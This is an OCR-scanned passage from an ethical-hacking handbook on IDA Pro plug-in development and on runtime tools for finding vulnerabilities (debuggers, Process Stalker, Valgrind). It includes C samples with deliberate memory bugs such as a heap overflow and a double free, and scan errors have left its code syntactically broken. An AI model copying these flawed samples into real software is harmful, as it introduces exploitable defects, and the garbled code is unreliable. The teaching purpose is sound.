// indicates how Ida should treat the plugin 
// plugin termination function, called when a 
// plugin is unloaded. Can be used for plugin 
// cleanup or set to NULL if no cleanup required. 

// plugin execution function. This is the function 
// that is called when a user activates the plugin 
// using the Edit menu or assigned plugin hotkey 
// Long description of the plugin. Not terribly 
// important. 

// Multiline help about the plugin 
// The name that will appear on the 
// Edit/Plugins submenu 

// The hotkey sequence to activate the plugin 
// "Alt-" or n Shift-F9" for example 
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An absolutely minimal plug-in that does nothing other than print a message to IDA 
Pro's message window appears next: 




NOTE wanted_hotkey is just that, the hotkey you want to use. IDA Pro 
makes no guarantee that your wanted_hotkey will be available, as more 
than one plug-in may request the same hotkey sequence. In such cases, the 
first plug-in that IDA Pro loads will be granted its wanted_hotkey, while 
subsequent plug-ins that request the same hotkey will only be able to be 
activated by using the Edit | Plugins menu. 



#include <ida.hpp> 

#include <loader.hpp> 

#include <kernwin . hpp> 

int idaapi my_init (void) { //idaapi marks this as stdcall 
//Keep this plugin regardless of processor type 

return PLUGIN_KEEP; //refer to loader. hpp for valid return values 

} 



void idaapi my_run(int arg) { //idaapi marks this as stdcall 
//This is where we should do something interesting 
static int count = 0; 

//The msg function is equivalent to IDC's Message 
msg ("Plugin activated %d time(s) \n", ++count) ; 

} 



char comment [] = "This is a simple plugin. It doesn't do much."; 
char help[] = 

"A simple plugin\n\n" 

"That demonstrates the basics of setting up a plugin. \n\n" 
"It doesn't do a thing other than print a message. \n"; 
char name [ ] = "GrayHat plugin"; 
char hotkey [] = "Alt-1"; 

plugin_t PLUGIN = { 

I DP_INTERFACE_VERS ION , 0, my_init, NULL, my_run, 
comment, help, name, hotkey 

} ; 



The IDA Pro SDK includes source code, along with make files and Visual Studio 
workspace files for several sample plug-ins. The biggest hurdle faced by prospective 
plug-in authors is learning the IDA Pro API. The plug-in API is far more complex than 
the API presented for IDC scripting. Unfortunately, plug-in API function names do not 
match IDC API function names; though generally if a function exists in IDC, you will 
be able to find a similar function in the plug-in API. Reading the Micallef s plug-in 
writer's guide along with the SDK-supplied headers and the source code to existing 
plug-ins is really the only way to learn how to write plug-ins. 

Building IDA Pro Plug-Ins 

Plug-ins are essentially shared libraries. On the Windows platform, this equates to a 
DLL. When building a plug-in, you must configure your build environment to build 
a DLL and link to the required IDA Pro libraries. The process is covered in detail in the 
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Micallef s plug-in writer's guide and many examples exist to assist you. The following is 
a summary of configuration settings that you must make: 

1. Specify build options to build a shared library. 

2. Set plug-in and architecture-specific defines IDP , and NT or 

LINUX . 

3. Add the appropriate SDK library directory to your library path. The 
SDK contains a number of libXXX directories for use with various build 
environments. 

4. Add the SDK include directory to your include directory path. 

5. Link with the appropriate IDA Pro library (ida.lib, ida.a, or pro. a). 

6. Make sure your plug-in is built with an appropriate extension (.plw for 
Windows, .plx for Linux). 

Once you have successfully built your plug-in, installation is simply a matter of 
copying the compiled plug-in to IDA Pro's plug-in directory. This is the directory within 
your IDA Pro program installation, not within your SDK installation. Any open data- 
bases must be closed and reopened in order for IDA Pro to scan for and load your plug- 
in. Each time a database is opened in IDA Pro, every plug-in in the plugins directory is 
loaded and its init function is executed. Only plug-ins whose init functions return 
PLUGIN_OK or PLUGIN_ KEEP (refer to loader.hpp) will be kept by IDA Pro. Plug-ins 
that return PLUGIN_SKIP will not be made available for current databases. 

IDAPython Plug-In 

The IDAPython plug-in by Gergely Erdelyi is an excellent example of extending the 
power of IDA Pro via a plug-in. The purpose of IDAPython is to make scripting both 
easier and more powerful at the same time. The plug-in consists of two major compo- 
nents: an IDA Pro plug-in written in C++ that embeds a Python interpreter into the 
current IDA Pro process, and a set of Python APIs that provides all of the scripting ca- 
pability of IDC. By making all of the features of Python available to a script developer, 
IDAPython provides both an easier path to IDA Pro scripting, because users can lever- 
age their knowledge of Python rather than learning a new language — IDC, and a much 
more powerful scripting interface, because all the features of Python, including data 
structures and APIs, become available to the script author. A similar plug-in named 
IdaRub was created by Spoonm to bring Ruby scripting to IDA Pro as well. 

ida-x86emu Plug-In 

The ida-x86emu plug-in by Chris Eagle addresses a different type of problem for the 
IDA Pro user, that of analyzing obfuscated code. All too often, malware samples, among 
other things, employ some form of obfuscation technique to make disassembly analy- 
sis more difficult. The majority of obfuscation techniques employ some form of self- 
modifying code that renders static disassembly listings all but useless other than to 
analyze the deobfuscation algorithms. Unfortunately, the deobfuscation algorithms 
seldom contain the malicious behavior of the code being analyzed, and as a result, the 
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analyst is unable to make much progress until the code can be deobfuscated and disas- 
sembled yet again. Traditionally, this has required running the code under the control 
of a debugger until the deobfuscation has been completed, then capturing a memory 
dump of the process, and finally, disassembling the captured memory dump. Unfortu- 
nately, many obfuscation techniques have been developed that attempt to thwart the 
use of debuggers and virtual machine environments. 

The ida-x86emu plug-in embeds an x86 emulator within IDA Pro and offers users 
the opportunity to step through disassembled code as if it were loaded into memory 
and running. The emulator treats the IDA Pro database as its virtual memory and pro- 
vides an emulation stack, heap, and register set. If the code being emulated is self- 
modifying, then the emulator reflects the modifications in the loaded database. In this 
way, emulation becomes the tool to both deobfuscate the code and to update the IDA 
Pro database to reflect all self-modifications without ever running the malicious code 
in question. The ida-x86emu plug-in will be discussed further in Chapter 29. 

IDA Pro Loaders and Processor Modules 

The IDA Pro SDK can be used to create two additional types of extensions for use with 
IDA Pro. IDA Pro processor modules are used to provide disassembly capability for 
new or unsupported processor families, whereas IDA Pro loader modules are used to 
provide support for new or unsupported file formats. Loaders may make use of existing 
processor modules, or may require the creation of entirely new processor modules if 
the CPU type was previously unsupported. An excellent example of a loader module is 
one designed to parse ROM images from gaming systems. Several example loaders are 
supplied with the SDK in the ldr subdirectory, while several example processor mod- 
ules are supplied in the module subdirectory. Loaders and processor modules tend to 
be required far less frequently than plug-in modules, and as a result, far less documen- 
tation and far fewer examples exist to assist in their creation. At their heart, both have 
architectures similar to plug-ins. 

Loader modules require the declaration of a global loader_t (from loader.hpp) 
variable named LDSC. This structure must be set up with pointers to two functions, one 
to determine the acceptability of a file for a particular loader, and the other to perform 
the actual loading of the file into the IDA Pro database. IDA Pro's interaction with loaders 
is as follows: 

1. When a user chooses a file to open, IDA Pro invokes the accept_file function 
for every loader in the IDA Pro loaders subdirectory. The job of the accept_file 
function is to read enough of the input file to determine if the file conforms 
to the format recognized by the loader. If the accept_file function returns 

a nonzero value, then the name of the loader will be displayed for the user 
to choose from. Figure 21-3 shows an example in which the user is being 
offered the choice of three different ways to load the program. In this case, 
two different loaders (pe.ldw and dos.ldw) have claimed to recognize the file 
format while IDA Pro always offers the option to load a file as a raw binary file. 

2. If the user elects to utilize a given loader, the loader's load_file function is 
called to load the file content into the database. The job of the loader can be 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 




Chapter 2 1 : Advanced Static Analysis with IDA Pro 

469 



as complex as parsing files, creating program segments within IDA Pro, and 
populating those segments with the correct content from the file, or it can be 
as simple as passing off all of that work to an appropriate processor module. 

Loaders are built in much the same manner as plug-ins, the primary difference be- 
ing the file extension, which is .ldw for Windows loaders and .llx for Linux loaders. 
Install compiled loaders into the loaders subdirectory of your IDA Pro distribution. 

IDA Pro processor modules are perhaps the most complicated modules to build. 
Processor modules require the declaration of a global processor^ (defined in idp 
.hpp) structure named LPH. This structure must be initialized to point to a number of 
arrays and functions that will be used to generate the disassembly listing. Required ar- 
rays define the mapping of opcode names to opcode values, the names of all registers, 
and a variety of other administrative data. Required functions include an instruction 
analyzer whose job is simply to determine the length of each instruction and to split 
the instruction's bytes into opcode and operand fields. This function is typically named 
ana and generates no output. An emulation function, typically named emu, is respon- 
sible for tracking the flow of the code and adding additional target instructions to the 
disassembly queue. Output of disassembly lines is handled by the out and out_op 
functions, which are responsible for generating disassembly lines for display in the IDA 
Pro disassembly window. 

There are a number of ways to generate disassembly lines via the IDA Pro API, and 
the best way to learn them is by reviewing the sample processor modules supplied with 
the IDA Pro SDK. The API provides a number of buffer manipulation primitives to 
build disassembly lines a piece at a time. Output generation is performed by writing 
disassembly line parts into a buffer and then, once the entire line has been assembled, 
writing the line to the IDA Pro display. Buffer operations should always begin by initial- 
izing your output buffer using the init_output_buffer function. IDA Pro offers a 
number of OutXXX and out_xrc functions that send output to the buffer specified in 
init_output_buffer. Once a line has been constructed, the output buffer should be 
finalized with a call to term_output_buffer before sending the line to the IDA Pro 
display using the printf_line function. The majority of available output functions are 
defined in the SDK header file ua.hpp. 

Finally, one word concerning building processor modules: while the basic build 
process is similar to that used for plug-ins and loaders, processor modules require an 
additional post-processing step. The SDK provides a tool named mkidp, which is used 
to insert a description string into the compiled processor binary. For Windows mod- 
ules, mkidp expects to insert this string in the space between the MSDOS header and 
the PE header. Some compilers, such as g++, in our experience do not leave enough 
space between the two headers for this operation to be performed successfully. The IDA 
Pro SDK does provide a custom DOS header stub named simply stub designed as a re- 
placement for the default MSDOS header. Getting g++ to use this stub is not an easy 
task. It is recommended that Visual Studio tools be used to build processor modules for 
use on Windows. By default, Visual Studio leaves enough space between the MSDOS 
and PE headers for mkidp to run successfully. Compiled processor modules should be 
installed to the IDA Pro procs subdirectory. 
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In the previous chapter, we took a look at the basics of reverse engineering source code 
and binary files. Conducting reverse engineering with full access to the way in which an 
application works (regardless of whether this is a source view or a binary view) is called 
white box testing. In this chapter, we take a look at alternative methodologies, often 
termed black box testing and gray box testing ; both require running the application that 
we are analyzing. In black box testing, you know no details of the inner workings of the 
application, whereas in gray box testing, you combine white box and black box tech- 
niques and, for example, run the application under the control of a debugger. The in- 
tent of these methodologies is to observe how the application responds to various in- 
put stimuli. 

In this chapter, you'll learn about the tools and techniques used for runtime detec- 
tion of potentially exploitable conditions in software, including how to generate inter- 
esting input values and how to analyze the behaviors that those inputs elicit from the 
programs you are testing. This chapter covers the following topics: 

• Why try to break software? 

• Overview of the software development process 

• Instrumentation tools 

• Fuzzing 

• Instrumented fuzzing tools and techniques 

Why Try to Break Software? 

In the computer security world, debate always rages as to the usefulness of vulnerabil- 
ity research and discovery. Other chapters in this book discuss some of the ethical issues 
involved, but in this chapter we will attempt to stick to practical reasons for trying to 
break software. Consider the following facts: 

• There is no regulatory agency for software reliability. 

• Virtually no software is guaranteed to be free from defects. 

• Most end-user license agreements (EULAs) require the user of a piece 
of software to hold the author of the software free from blame for any 
damage caused by the software. 
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Given these circumstances, who is to blame when a computer system is broken into 
because of a newly discovered vulnerability in an application or the operating system 
that happens to be running on that computer? Arguments are made either way, blam- 
ing the vendor for creating the vulnerable software in the first place, or blaming the user 
for failing to quickly patch or otherwise mitigate the problem. The fact is, given the cur- 
rent state of the art in intrusion detection, users can only defend against known threats. 
This leaves passive users to rely completely on ethical security researchers to discover 
vulnerabilities and report them and on vendors to develop patches for those vulnera- 
bilities before they are discovered and exploited in a malicious fashion. The most 
aggressive sysadmin whose systems always have the latest patches applied will always 
be at the mercy of those who possess zero-day exploits. Vendors can't develop patches 
for problems that they are unaware of or refuse to acknowledge (which defines the 
nature of a zero-day exploit). 

If you believe that vendors will discover every problem in their software before others 
do, and you believe that those vendors will release patches for those problems in an 
expeditious manner, then this chapter is probably not for you. This chapter (and others 
in this book) is for those people who want to take at least some measure of control in 
ensuring that their software is as secure as possible. 

Overview of the Software Development Process 

We will avoid any in-depth discussion of how software is developed, and instead en- 
courage you to seek out a textbook on software engineering practices. In many cases, 
software is developed by some orderly, perhaps iterative, progression through the fol- 
lowing activities: 

• Requirements analysis Determining what the software needs to do 

• Design Planning out the pieces of the program and considering how they 
will interact 

• Implementation Expressing the design in software source code 

• Testing Ensuring that the implementation meets the requirements 

• Operation and support Deploying the software to end users and supporting 
the product in end-user hands 

Problems generally creep into the software during any of the first three phases. 
These problems may or may not be caught in the testing phase. Unfortunately, those 
problems that are not caught in testing are destined to manifest themselves after the 
software is already in operation. Many developers want to see their code operational as 
soon as possible and put off doing proper error checking until after the fact. While they 
usually intend to return and implement proper error checks once they can get some 
piece of code working properly, all too often they forget to return and fill in the missing 
error checks. The typical end user has influence over the software only in its opera- 
tional phase. A security conscious end user should always assume that there are prob- 
lems that have avoided detection all the way through the testing phase. Without access 
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to source code and without resorting to reverse engineering program binaries, end users 
are left with little choice but to develop interesting test cases and to determine whether 
programs are capable of securely handling these test cases. A tremendous number of 
software bugs are found simply because a user provided unexpected input to a pro- 
gram. One method of testing software involves exposing the software to large numbers 
of unusual input cases. This process is often termed stress testing when performed by the 
software developer. When performed by a vulnerability researcher, it is usually called 
fuzzing. The difference in the two is that the software developer has a far better idea of 
how he expects the software to respond than the vulnerability researcher, who is often 
hoping to simply record something anomalous. 

Fuzzing is one of the main techniques used in black/gray box testing. To fuzz 
effectively, two types of tools are required, instrumentation tools and fuzzing tools. 
Instrumentation tools are used to pinpoint problem areas in programs either at runtime 
or during post-crash analysis. Fuzzing tools are used to automatically generate large 
numbers of interesting input cases and feed them to programs. If an input case can be 
found that causes a program to crash, you make use of one or more instrumentation 
tools to attempt to isolate the problem and determine whether it is exploitable. 

Instrumentation Tools 

Thorough testing of software is a difficult proposition at best. The challenge to the tester 
is to ensure that all code paths behave predictably under all input cases. To do this, test 
cases must be developed that force the program to execute all possible instructions with- 
in the program. Assuming the program contains error handling code, these tests must 
include exceptional cases that cause execution to pass to each error handler. Failure to 
perform any error checking at all and failure to test every code path are just two of the 
problems that attackers may take advantage of. Murphy's Law assures us that it will be 
the one section of code that was untested that will be the one that is exploitable. 

Without proper instrumentation, determining why a program has failed will be dif- 
ficult, if not impossible. When source code is available, it may be possible to insert 
"debugging" statements to paint a picture of what is happening within a program at 
any given moment. In such a case, the program itself is being instrumented and you can 
turn on as much or as little detail as you choose. When all that is available is a compiled 
binary, it is not possible to insert instrumentation into the program itself. Instead, you 
must make use of tools that hook into the binary in various ways in your attempt to 
learn as much as possible about how the binary behaves. In searching for potential 
vulnerabilities, it would be ideal to use tools that are capable of reporting anomalous 
events, because the last thing you want to do is sort through mounds of data indicating 
that a program is running normally. We will cover several types of software testing tools 
and discuss their applicability to vulnerability discovery. The following classes of tools 
will be reviewed: 

• Debuggers 

• Code coverage analysis tools 
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• Profiling tools 

• Flow analysis tools 

• Memory use monitoring tools 

Debuggers 

Debuggers provide fine-grain control over an executing program and can require a fair 
amount of operator interaction. During the software development process, they are 
most often used for isolating specific problems rather than for large-scale automated 
testing. When you use a debugger for vulnerability discovery, however, you take advan- 
tage of the debugger's ability to both signal the occurrence of an exception and provide 
a precise snapshot of a program's state at the moment it crashes. During black box test- 
ing, it is useful to launch programs under the control of a debugger prior to any fault 
injection attempts. If a black box input can be generated to trigger a program exception, 
detailed analysis of the CPU registers and memory contents captured by the debugger 
makes it possible to understand what avenues of exploitation might be available as a 
result of a crash. 

The use of debuggers needs to be well thought out. Threaded programs and pro- 
grams that fork can be difficult for debuggers to follow. 




NOTE A fork operation creates a second copy, including all state, variable, 
and open file information, of a process. Following the fork, two identical 
processes exist, distinguishable only by their process IDs. The forking process 
is termed the parent and the newly forked process is termed the child.The 
parent and child processes continue execution independently of each other. 



Following a fork operation, you must decide whether to follow and debug the child 
process or to stick with and continue debugging the parent process. Obviously, if you 
choose the wrong process, you may completely fail to observe an exploitable opportu- 
nity in the opposing process. For processes that are known to fork, it is occasionally an 
option to launch the process in nonforking mode. This option should be considered if 
black box testing is to be performed on such an application. When forking cannot be 
prevented, a thorough understanding of the capabilities of your debugger is a must. For 
some operating system/debugger combinations, it is not possible for the debugger to 
follow a child process after a fork operation. If it is the child process you are interested 
in testing, some way of attaching to the child after the fork has occurred is required. 




NOTE The act of attaching a debugger to a process refers to using a 
debugger to latch onto a process that is already running.This is different from 
the common operation of launching a process under debugger control. When 
a debugger attaches to a process, the process is paused and will not resume 
execution until a user instructs the debugger to do so. 
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When using a GUI-based debugger, attaching to a process is usually accomplished 
via a menu option (such as File | Attach) that presents a list of currently executing pro- 
cesses. Console-based debuggers, on the other hand, usually offer an attach command 
that requires a process ID (PID) obtained from a process-listing command such as ps. 

In the case of network servers, it is common to fork immediately after accepting a 
new client connection in order to allow a child process to handle the new connection 
while the parent continues to accept additional connection requests. By delaying any 
data transmission to the newly forked child, you can take the time to learn the PID of 
the new child and attach to it with a debugger. Once you have attached to the child, you 
can allow the client to continue its normal operation (usually fault injection in this 
case), and the debugger will catch any problems that occur in the child process rather 
than the parent. The GNU debugger, gdb, has an option named follow-fork-mode 
designed for just this situation. Under gdb, follow-fork-mode can be set to parent, 
child, or ask, such that gdb will stay with the parent, follow the child, or ask the user 
what to do when a fork occurs. 




gdb’s follow-fork-mode option is not available on all architectures. 



Another useful feature available in some debuggers is the ability to analyze a core 
dump file. A core dump is simply a snapshot of a process's state, including memory 
contents and CPU register values, at the time an exception occurs in a process. Core 
dumps are generated by some operating systems when a process terminates as a result 
of an unhandled exception such as an invalid memory reference. Core dumps are par- 
ticularly useful when attaching to a process is difficult to accomplish. If the process 
can be made to crash, you can examine the core dump file and obtain all of the same 
information you would have gotten had you been attached to the process with a de- 
bugger at the moment it crashed. Core dumps may be limited in size on some systems 
(they can take up quite a bit of space), and may not appear at all if the size limit is set 
to zero. Commands to enable the generation of core files vary from system to system. 
On a Linux system, using the bash shell, the command to enable core dumps looks 
like this: 



# ulimit -c unlimited 



The last consideration for debuggers is that of kernel-level debugging versus user 
space debugging. When performing black box testing of user space applications, which 
includes most network server software, user space debuggers usually provide adequate 
monitoring capabilities. OllyDbg, written by Oleh Yuschuk, and WinDbg, available 
from Microsoft, are two user space debuggers for the Microsoft Windows family of 
operating systems, gdb is the principle user space debugger for Unix/Linux operating 
systems. 
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To monitor kernel-level software such as device drivers, kernel-level debuggers are 
required. Unfortunately, in the Linux world at least, kernel-level debugging tools are 
not terribly sophisticated at the moment. On the Windows side, Microsoft's WinDbg 
has become the kernel-level debugger of choice following the demise of Compuware's 
SoftlCE product. 

Code Coverage Analysis Tools 

Code coverage tools give developers an idea of what portions of their programs are ac- 
tually getting executed. Such tools are excellent aids for test case development. Given 
results that show what sections of code have and have not been executed, additional 
test cases can be designed to cause execution to reach larger and larger percentages of 
the program. Unfortunately, code coverage tools are generally more useful to the soft- 
ware developer than to the vulnerability researcher. They can point out the fact that you 
have or have not reached a particular section of code, but indicate nothing about the 
correctness of that code. Further complicating matters, commercial code coverage tools 
often integrate into the compilation phase of program development. This is obviously 
a problem if you are conducting black box analysis of a binary program, as you will not 
be in possession of the original source code. 

There are two principal cases in which code coverage tools can assist in exploit devel- 
opment. One case arises when a researcher has located a vulnerability by some other 
means and wishes to understand exactly how that vulnerability can be triggered by un- 
derstanding how data flows through the program. The second case is in conjunction 
with fuzzing tools to understand what percentage of an application has been reached via 
generated fuzzing inputs. In the second case, the fuzzing process can be tuned to attempt 
to reach code that is not getting executed initially. Here the code coverage tool becomes 
an essential feedback tool used to evaluate the effectiveness of the fuzzing effort. 

Pedram Amini's Process Stalker is a powerful, freely available code coverage tool 
designed to perform in the black box testing environment. Process Stalker consists of 
two principal components and some post-processing utilities. The heart of Process 
Stalker is its tracing module, which requires a list of breakpoints and the name or PID 
of a process to stalk as input. Breakpoint lists are currently generated using an IDA Pro 
plug-in module that extracts the block structure of the program from an IDA Pro disas- 
sembly and generates a list of addresses that represent the first instruction in each basic 
block within the program. At the same time, the plug-in generates GML (Graph Model- 
ing Language) files to represent each function in the target program. These graph files 
form the basis of Process Stalker's visualization capabilities when they are combined 
with runtime information gathered by the tracer. (As an aside, these graph files can 
be used with third-party graphing tools such as GDE Community Edition from 
www.oreas.com to provide an alternative to IDA Pro's built-in graphing capabilities.) 

The tracer is then used to attach to or launch the desired process, and it sets break- 
points according to the breakpoint list. Once breakpoints have been set, the tracer 
allows the target program to continue execution and the tracer makes note of all break- 
points that are hit. The tracer can optionally clear each breakpoint when the breakpoint 
is hit for the first time in order to realize a tremendous speedup. Recall that the goal of 
code coverage is to determine whether all branches have been reached, not necessarily 
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to count the number of times they have been reached. To count the number of times an 
instruction has been executed, breakpoints must remain in place for the lifetime of the 
program. Setting breakpoints on every instruction in a program would be very costly 
from a performance perspective. To reduce the amount of overhead required, Process 
Stalker, like BinDiff, leverages the concept of a basic block of code. When setting break- 
points, it is sufficient to set a breakpoint only on the first instruction of each basic 
block, since a fundamental property of basic blocks is that once the first instruction in 
a block is hit, all remaining instructions in the block are guaranteed to be executed in 
order. As the target program runs under the tracer's control, the tracer logs each break- 
point that is hit and immediately resumes execution of the target program. A simple 
example of determining the PID of a Windows process and running a trace on it in 
Process Stalker is shown here: 

# tasklist /FI "IMAGENAME eq calc.exe" 

Image Name PID Session Name Session# Mem Usage 

calc.exe 1844 Console 0 2,704 K 

# . /process_stalker -a 1844 -b calc.exe.bpl -r 0 --one-time — no-regs 

For brevity, the console output of process_stalker is omitted. The example shows 
how a PID might be obtained, using the Windows tasklist command, and then passed 
to the process_stalker command to initiate a trace. The process_stalker command ex- 
pects to be told the name of a breakpoint list, calc.exe.bpl in this case, which was previ- 
ously generated using the IDA Pro plug-in component of Process Stalker. Once a trace 
is complete, the post-processing utilities (a set of Python scripts) are used to process 
and merge the trace results to yield graphs annotated with the gathered trace data. 

Profiling Tools 

Profiling tools are used to develop statistics about how much time a program spends in 
various sections of code. This might include information on how frequently a particu- 
lar function is called, and how much execution time is spent in various functions or 
loops. Developers utilize this information in an attempt to improve the performance of 
their programs. The basic idea is that performance can be visibly improved by making 
the most commonly used portions of code very fast. Like code coverage tools, profiling 
tools may not be of tremendous use in locating vulnerabilities in software. Exploit de- 
velopers care little whether a particular program is fast or slow; they care simply wheth- 
er the program can be exploited. 

Flow Analysis Tools 

Flow analysis tools assist in understanding the flow of control or data within a pro- 
gram. Flow analysis tools can be run against source code or binary code, and often 
generate various types of graphs to assist in visualizing how the portions of a program 
interact. IDA Pro offers control flow visualization through its graphing capabilities. The 
graphs that IDA Pro generates are depictions of all the cross-referencing information 
that IDA Pro develops as it analyzes a binary. Figure 22-1 shows a function call tree 



PART IV 



Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

478 



Figure 22-1 

Function call 
tree for function 

sub_804882F 




generated by IDA Pro for a very simple program using IDA Pro's Xrefs From (cross-ref- 
erences from) menu option. In this case, we see all the functions referenced from a 
function named sub_804882F, and the graph answers the question, "Where do we go 
from here?" To generate such a display, IDA Pro performs a recursive descent through 
all functions called by sub_804882F. 

Graphs such as that in Figure 22-1 generally terminate at library or system calls for 
which IDA Pro has no additional information. 

Another useful graph that IDA Pro can generate comes from the Xrefs To option. 
Cross-references to a function lead us to the points at which a function is called and 
answers the question, "How did we get here?" Figure 22-2 is an example of the cross- 
references to the function send() in a simple program. The display reveals the most 
likely points of origin for data that will be passed into the send() function (should that 
function ever get called). 

Graphs such as that in Figure 22-2 often ascend all the way up to the entry point of 
a program. 

A third type of graph available in IDA Pro is the function flowchart graph. As shown 
in Figure 22-3, the function flowchart graph provides a much more detailed look at the 
flow of control within a specific function. 



Figure 22-2 

Cross-references to 
the send function 



Start 



sub_8048A49 
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Figure 22-3 IDA Pro-generated flowchart for sub_80487EB 



One shortcoming of IDA Pro's graphing functionality is that many of the graphs it 
generates are static, meaning that they can't be manipulated, and thus they can't be 
saved for viewing with third-party graphing applications. This shortcoming is addressed 
by BinNavi (discussed in Chapter 20) and to some extent Process Stalker. 

The preceding examples demonstrate control flow analysis. Another form of flow 
analysis examines the ways in which data transits a program. Reverse data tracking at- 
tempts to locate the origin of a piece of data. This is useful in determining the source of 
data supplied to a vulnerable function. Forward data tracking attempts to track data 
from its point of origin to the locations in which it is used. Unfortunately, static analy- 
sis of data through conditional and looping code paths is a difficult task at best. 
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Memory Use Monitoring Tools 

Some of the most useful tools for black box testing are those that monitor the way that 
a program uses memory at runtime. Memory monitoring tools can detect the following 
types of errors: 

• Access of uninitialized memory 

• Access outside of allocated memory areas 

• Memory leaks 

• Multiple release (freeing) of memory blocks 




CAUTION Dynamic memory allocation takes place in a program’s heap 
space. Programs should return all dynamically allocated memory to the heap 
manager at some point. When a program loses track of a memory block by 
modifying the last pointer reference to that block, it no longer has the ability 
to return that block to the heap manager.This inability to free an allocated 
block is called a memory leak . While memory leaks may not lead directly to 
exploitable conditions, the leaking of a sufficient amount of memory can 
exhaust the memory available in the program heap. At a minimum, this will 
generally result in some form of denial of service. Dynamic memory allocation 
takes place in a program’s heap space. Programs should return all dynamically 
allocated memory to the heap manager at some point. When a program loses 
track of a memory block by modifying the last pointer reference to that block, 
it no longer has the ability to return that block to the heap manager.This 
inability to free an allocated block is called a memory leak. 



Each of these types of memory problems has been known to cause various vulner- 
able conditions from program crashes to remote code execution. 



Valgrind 

Valgrind is an open source memory debugging and profiling system for Linux x86 pro- 
gram binaries. Valgrind can be used with any compiled x86 binary; no source code is 
required. It is essentially an instrumented x86 interpreter that carefully tracks memory 
accesses performed by the program being interpreted. Basic Valgrind analysis is per- 
formed from the command line by invoking the valgrind wrapper and naming the 
binary that it should execute. To use Valgrind with the following example, 

/* 

* valgrind_l . c - uninitialized memory access 
*/ 

int main ( ) { 

int p, t; 

if (p == 5) { /*Error occurs here*/ 

t = p + 1; 

} 

return 0; 
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you simply compile the code and then invoke Valgrind as follows: 

# gcc -o valgrind_l valgrind_l . c 

# valgrind . /valgrind_l 

Valgrind runs the program and displays memory use information as shown here: 



==16541== 

==16541== 

==16541== 

==16541== 

==16541== 

==16541== 



Memcheck, a.k.a. Valgrind, a memory error detector for x86-linux. 
Copyright (C) 2002-2003, and GNU GPL'd, by Julian Seward. 

Using valgrind-2 . 0 . 0 , a program supervision framework for x86-linux. 
Copyright (C) 2000-2003, and GNU GPL'd, by Julian Seward. 

Estimated CPU clock rate is 3079 MHz 
For more details, rerun with: -v 



==16541== 



==16541== 

==16541== 

==16541== 

==16541== 

==16541== 



Conditional jump or move depends on uninitialised value (s) 
at 0x8048328: main (in valgrind_l) 

by 0xB3ABBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x8048284: (within valgrind_l) 



==16541== 

==16541== 

==16541== 

==16541== 

==16541== 



ERROR SUMMARY: 1 errors from 1 
malloc/free: in use at exit: 0 
malloc/free: 0 allocs, 0 frees 
For a detailed leak analysis, 
For counts of detected errors. 



contexts (suppressed: 0 from 0) 
bytes in 0 blocks. 

0 bytes allocated, 
rerun with: --leak-check=yes 
rerun with: -v 



In the example output, the number 16541 in the left margin is the PID of the 
Valgrind process. The first line of output explains that Valgrind is making use of its 
memcheck tool to perform its most complete analysis of memory use. Following the 
copyright notice, you see the single error message that Valgrind reports for the example 
program. In this case, the variable p is being read before it has been initialized. Because 
Valgrind operates on compiled programs, it reports virtual memory addresses in its 
error messages rather than referencing original source code line numbers. The ERROR 
SUMMARY at the bottom is self-explanatory. 

A second simple example demonstrates Valgrind's heap-checking capabilities. The 
source code for this example is as follows: 



/* 

* valgrind_2 . c - access outside of allocated memory 
*/ 

#include <stdlib.h> 
int main ( ) 

int *p, a; 

p = malloc(10 * sizeof (int) ) ; 

p [ 1 0 ] = 1; /* invalid write error */ 

a = p [ 10 ] ; /* invalid read error */ 

free (p) ; 
return 0; 

} 



This time Valgrind reports errors for an invalid write and read outside of allocated 
memory space. Additionally, summary statistics report on the number of bytes of 
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memory dynamically allocated and released during program execution. This feature 
makes it very easy to recognize memory leaks within programs. 



==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 

==16571== 



Invalid write of size 4 

at 0x80483A2: main (in valgrind_2) 

by 0x398BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_2) 

Address 0x52A304C is 0 bytes after a block of size 40 alloc' d 
at 0x90068E: malloc (vg_replace_malloc . c : 153 ) 
by 0x8048395: main (in valgrind_2) 

by 0x398BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_2) 

Invalid read of size 4 

at 0x80483AE: main (in valgrind_2) 

by 0x398BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_2) 

Address 0x52A304C is 0 bytes after a block of size 40 alloc' d 
at 0x90068E: malloc (vg_replace_malloc . c : 153 ) 
by 0x8048395: main (in valgrind_2) 

by 0x398BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_2 

ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) 
malloc/free: in use at exit: 0 bytes in 0 blocks, 
malloc/free: 1 allocs, 1 frees, 40 bytes allocated. 

For a detailed leak analysis, rerun with: --leak-check=yes 
For counts of detected errors, rerun with: -v 



The type of errors reported in this case might easily be caused by off-by-one errors 
or a heap-based buffer overflow condition. 

The last Valgrind example demonstrates reporting of both a memory leak and a 
double free problem. The example code is as follows: 



/* 

* valgrind_3 . c - memory leak/double free 
*/ 

#include <stdlib.h> 
int main ( ) { 

int *p; 

p = (int*) malloc (10 * sizeof (int) ) ; 

p = (int*) malloc (40 * sizeof (int) ) ; //first block has now leaked 
free (p) ; 

free (p) ; //double free error 
return 0; 




NOTE A double free condition occurs when the free function is called a 
second time for a pointer that has already been freed. The second call to 
free corrupts heap management information that can result in an exploitable 
condition. 
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The results for this last example follow. In this case, Valgrind was invoked with the 
detailed leak checking turned on. 

# valgrind --leak-check=yes . /valgrind_3 



This time an error is generated by the double free, and the leak summary reports 
that the program failed to release 40 bytes of memory that it had previously allocated: 



==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 



Invalid free() / delete / delete [] 

